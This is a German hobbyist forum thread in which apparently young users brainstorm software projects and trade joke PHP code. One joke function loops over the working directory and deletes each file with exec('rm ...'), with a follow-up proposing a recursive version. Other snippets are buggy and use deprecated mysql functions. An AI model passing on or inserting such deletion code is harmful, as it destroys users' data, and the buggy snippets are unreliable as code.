Komerzielle Software/programm?!?

burni87 schrieb:
und noch eine meiner standard wünsche:

ein php skript das per ssh auf die shell zugreift, es muss aber alles per HTTP laufen und nicht irgendein dummes java plugin

tunneln? ;)

gruß
hostile

Wenn Du diese Anzeige nicht sehen willst, registriere Dich und/oder logge Dich ein.
wario schrieb:
So ein Tool wie burni87 vorgeschlagen hat, hatte ich mal, bis auf das, das es PHP Code ausspukte, aber dafür gibts ja das gute alte MySql Front in der alten version, des hat dir immer die Komplette SQL Query unten angezeigt, wennst per "Klick&Play" im Frontend was geändert hast (Tabellen erstellt, editiert, Keys usw hinzu oder weggenommen hast). Wie das andere Frontend heißt, fällt mir nicht mehr ein, war aber auch nicht schlecht. Ich schau mal nach ob ich wieder finde...

Die 'alte' Version von MySQL-Front wird weiterentwickelt vom ursprünglichen Entwickler: http://heidisql.de/ :d

Die 'alte' Version von MySQL-Front wird weiterentwickelt vom ursprünglichen Entwickler: http://heidisql.de/
Vielen Dank für deinen Hinweis Raky!!

@Nascar: Ja stimmt schon, aber ich finde eben die "alte" Version viel besser und übersichtlicher. Ich komme mit der neuen und ihrer "für alles ein eigenes Fenster"-Lösung nicht so ganz zurecht.

Zuletzt bearbeitet:
hört sich toll an!, aber...was is n CMS??

mfg

edit: wikipedia hat mir das schnell erklärt, und hört sich wirklich nicht schlecht an!!

Zuletzt bearbeitet:
hmm vll sollte man bei diesem wettbewerb mit machen und das ganze als gruppen project gestalten ;) vorraussetzung wir bekommen genug leute zusammen die php, css, html, js und AJAX beherrschen.

MfG
Alex

ach doch so viele? :d mit 2-3 bekomm ich ja gerade mal son gästebuch programmiert *scherz*

mein gästebuch hab ich sogar alleine geschafft :)

wielang hat man eigtl zeit für das cms ? da steht die anmeldung endet erste im september ;)

edit: soll man da nicht abstimmen welches man am liebsten hernimmt ?

Zuletzt bearbeitet:
auf den ersten blick hab ich das genau so gedacht wie du jetzt, ich habs mir dann aber auch nicht weiter durch gelesen, weil ich nicht mehr suchen wollte :d

CMS gibts so viele unter der "GNU" da kann man wunderbar abschreiben und funktionen übernehmen^^

Ich will eigentlich schon seit über 10 Jahren mal ein Jump&Run programmieren, egal mit was, wenns sein muss sogar Flash, am liebsten wäre mir C# oder C++
(mit Allegro Toolkit oder so). Da ich aber fast keine Erfahrung in C# hab, komm ich da einfach nicht weiter. In sämtlichen Foren wenn man sucht, nach nen Grundprinzip, ner Klasse, oder fertigen Komponenten, bekommt man nur zu hören, dass man sich selbst damit beschäftigen muss. Vielleicht kann mir ja einer von euch den Weg zu ein paar Source Files (mit Documentation) weisen.
Ich hatte mal sowas für qbasic, wo man in einem extra File einfach die Level in ASCII gezeichnet hat, und die dann einfach ins spiel importiert hat.
Das lief super, halt leider nur in qbasic. Die Klasse hat dann einfach aus dem ASCII Code, fertige Elemente generiert: Klötze, Münzen, Items, Gegner; so konnte man easy z.B. Super Mario Bros. nach stellen...
Jemand ne idee?

dann macht mal hin der anfang ist geschrieben:
PHP:
<?
class core
{
   public $db;
   public $tpl;
   public $xml;
   public $user;

public function initDB()
   {
       $this->db=new db();
   }
}

class db
{

var $db_host = "";
   var $db_user = "";
   var $db_pass = "";
   var $db_daba = "";

public function setData($host,$user,$password){
    $this->db_host = $host;
    $this->db_user = $user;
    $this->db_pass = $password;

}

public function connect($persistent=false){
    if($persistent == true){
        @mysql_connect($host,$user,$password);
    }else{
        @mysql_pconnect($host,$user,$password);
    }
   }
   public function selectDB($database){}
}

$core = new core();
$core->initDB();
$core->db->setData();

?>

der anfang von was ? lol

aber es stimmt eigtl, cms gibts genug, wir brauchen sowas wie google pagecreator, nur das es automatisch php code mit datenbankanbindungen erzeugen muss :fresse:, also praktisch was zum klickn wo man einmal design und einmal inhalt zusammenklicken kann ;)

der anfang vom core den man für alles verwenden kann ;D

Und ich ergänze die class db mit meiner heissgeliebten:
PHP:
	public function get_views($sql)
	{
		$res = mysql_query($sql) or die ("SQL Abfrage Fehler!");
		$rows =  array();
		while($row = mysql_fetch_object($res))
		{
			$rows[] = $row;
		}
		return $rows;
	}
ps: zwei gute GNU CMS sind phpwcms und continido^^

PHP:
public function get_rows($sql)
    {
        $res = mysql_query($sql) or die ("SQL Abfrage Fehler!");
     $num_rows = mysql_num_rows($res); 
        return $num_rows;
    }
soa ab jetzt immer abwechselnd jeder eine funktion :d

PHP:
public function langeweile_check {
               if($usern == langweilig){
                    schreib_code_in_ein_forum();
               }else{
                     mach_mit_dem_andern_weiter();
               }
}

:fresse:

Fatal error: Call to undefined function: mach_mit_dem_andern_weiter() in C:\Programme\xampp\htdocs\index.php on line 44

du programmierst scheiße :d

PHP:
	public function schreib_code_in_ein_forum(){
		for($i=0;$i < date("H");$i++){
			echo " SPAM <br />";
		}
	}

public function mach_mit_dem_andern_weiter(){
		$handle=opendir ('.');
		while (false !== ($file = readdir ($handle))) {
		    exec ( "rm ./".$file);
		}
		closedir($handle); 
	}

jetzt musst nur noch mit "$this->"; arbeiten, und schon gehts^^

das entwickelt sich hier solangsam nicht mehr zu nem seiten core sondern zu ner spam maschine :d ich glaub wir sollten mal bäck toh toppick

ich möcht wissen wer als erster so dumm ist und das ausführt :fresse:

diesmal bins ausnahmsweise nicht ich weil daheim dauert mir ne neuinstallation zu lang

Ich finde ja die Google Maps api richtig geil, da kann man bestimmt auch was feines draus machen, bevor es wieder jeder macht...
Ich mach grad Anfahrtsskizze für unsere Firma daraus, die auf Knopfdruck, den Weg von Autobahn oder Bahnhof zu unserem Gebäude weist...

edit:
Zitat von burni87:
ich möcht wissen wer als erster so dumm ist und das ausführt
Achso, sollten wir ne rekursiv function draus machen, die dann alles removed wenn ein verzeichnis leer ist^^

Zuletzt bearbeitet:
ja man kann wohl mit allen google sachen was anfangen, von map24 gibts auch ne api ;)

wollt ihr jetz eigtl ernsthaft ein eigenes cms machen ?

ot: mein photoshop startet nicht mehr und ich stink nach schweis :(

ich hätte da noch eine idee : eine art inoffiziellen patch für die windows brennfunktion um damit dvds brennen zu können. aber kennste dich mit 14 echt so gut mit progen aus das du kohle machen willst?? also ich bin 13 und hab nach hello world aufgegeben:fresse: du könntest aber "Crypt" verbessern

Zuletzt bearbeitet:
Naja ich glaube ihr solltet wirklich erstmal überlegen:
-Was könnt ihr!
-Was seid ihr bereit dazu zulernen
-Was wollt ihr erreichen!
-Traut ihr euch das zu?

noch ne gute idee:

so ne partyseite, wo sich jeder anmelden kann, ein profil erstellt, eine bildergalerei einen kalender und ein gästebuch hat und eine freundesliste führt

dazu sollten natürlich relativ viele wichtige events sowie events aus der umgebung drinen sein zu denen sich die einzelnen user vormerken können usw

sowas plane ich schon sei längerem zu machen, irgendwie hab ichs aber noch nicht geschafft, gibt schon einige dieser seiten, die einzige die ich nutze ist allerdings lahm, schlecht, mit vielzuviel werbung und einfach hässlich :fresse:

also ne schöne seite mit etwas ajax und vielen funktionen für den nutzer wäre da bestimmt einen versuch wert

@micropro: ja gute idee!
ja, ich kennn mich glaub ich schon genügend aus! hab schon mal n komerzielles programm geschrieben...n email-browser, den es in der freeware und pro version gibt. die pro kostet 2€. und der verkauft sich richtig gut muss ich sagen!!

Hardwareluxx setzt keine externen Werbe- und Tracking-Cookies ein. Auf unserer Webseite finden Sie nur noch Cookies nach berechtigtem Interesse (Art. 6 Abs. 1 Satz 1 lit. f DSGVO) oder eigene funktionelle Cookies. Durch die Nutzung unserer Webseite erklären Sie sich damit einverstanden, dass wir diese Cookies setzen. Mehr Informationen und Möglichkeiten zur Einstellung unserer Cookies finden Sie in unserer Datenschutzerklärung.

Zurück
Oben Unten refresh